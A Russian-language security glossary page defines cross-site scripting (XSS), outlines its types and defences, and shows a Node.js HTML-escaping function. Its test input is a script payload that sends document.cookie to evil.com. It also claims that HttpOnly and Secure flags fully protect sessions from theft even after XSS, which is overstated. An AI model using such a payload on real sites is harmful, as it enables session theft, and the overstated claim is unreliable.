Тема
Режим
Язык
Тема
Режим
Язык
Регистрация
FREE Бесплатный аудит сайта за 15 мин Заказать →
Атака

XSS

Синонимы:
Cross-Site Scripting межсайтовый скриптинг
Определение

Cross-Site Scripting — атака через внедрение вредоносного JavaScript-кода на страницу сайта. Позволяет красть cookies, перехватывать данные пользователей.

К
Проверено экспертом
Константин Северов DevOps-инженер

10+ лет в DevOps и SRE. Строил инфраструктуру для стартапов и enterprise. Специализация: CI/CD, мониторинг, отказоустойчивость, автоматизация.

Детальный разбор

Внедрение вредоносного кода (Cross-Site Scripting)

Cross-Site Scripting (XSS) — это уязвимость прикладного уровня, при которой злоумышленник внедряет вредоносный JavaScript-код в веб-страницу, просматриваемую другими пользователями. Различают три типа XSS: Хранимая (Stored), Отраженная (Reflected) и DOM-based. Успешная XSS-атака позволяет украсть файлы cookie авторизации (Session Hijacking), перехватить ввод конфиденциальных данных (кейлоггинг) или выполнить вредоносные действия от лица жертвы. WAF блокирует XSS-сигнатуры на входе, а разработчики защищают приложение с помощью экранирования вывода и строгой политики Content Security Policy (CSP).

📝
Заметка
Защита куки: Установка флагов HttpOnly и Secure для сессионных кук полностью блокирует возможность их чтения через JavaScript, защищая сессии пользователей от кражи даже при успешной XSS-атаке.
// Пример правильного экранирования HTML перед выводом в DOM на Node.js
function escapeHTML(str) {
  return str.replace(/[&<>'"]/g, 
    tag => ({
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      "'": '&#39;',
      '"': '&quot;'
    }[tag] || tag)
  );
}
const unsafeInput = '<script>fetch("http://evil.com/steal?cookie="+document.cookie)</script>';
console.log("Safe output:", escapeHTML(unsafeInput));

Подвергаетесь DDoS-атакам или хотите защитить инфраструктуру?

Наши инженеры проведут аудит уязвимостей и настроят комплексную эшелонированную защиту.